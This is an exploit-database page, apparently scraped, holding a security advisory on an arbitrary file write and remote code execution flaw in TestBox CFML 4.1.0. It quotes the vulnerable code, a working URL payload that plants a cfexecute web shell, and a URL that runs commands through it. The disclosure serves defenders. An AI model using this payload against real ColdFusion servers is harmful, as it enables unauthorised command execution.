Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution"

Author

Exploit author

"Darren King"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-11-19

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.4.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61  

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, 
and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Command Injection & RCE
------------------------
The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host.
The block below shows the vulnerable code:

HTMLRunner.cfm, lines 51-73:
// Write TEST.properties in report destination path.
if( url.propertiesSummary ){
	testResult = testbox.getResult();
	errors = testResult.getTotalFail() + testResult.getTotalError();
	savecontent variable="propertiesReport"{
		writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
		writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
		test.bundles=#URL.bundles#
		test.directory=#url.directory#
		total.bundles=#testResult.getTotalBundles()#
		total.suites=#testResult.getTotalSuites()#
		total.specs=#testResult.getTotalSpecs()#
		total.pass=#testResult.getTotalPass()#
		total.fail=#testResult.getTotalFail()#
		total.error=#testResult.getTotalError()#
		total.skipped=#testResult.getTotalSkipped()#" );
	}

	//ACF Compatibility - check for and expand to absolute path
	if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath );

	fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
}

If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed.
The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output
a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. 
The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and
not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM
can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. 
(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.)

Sample URL to write local CFM file:
http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>

Sample URL to confirm:
http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all

Versions Affected
------------------------
Versions affected (and platform tested on):
  - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
  - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.4.0+80-201612030044  (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  
Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2020-11-19 "TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution" webapps multiple "Darren King"
2020-11-19 "TestBox CFML Test Framework 4.1.0 - Directory Traversal" webapps multiple "Darren King"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49077/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.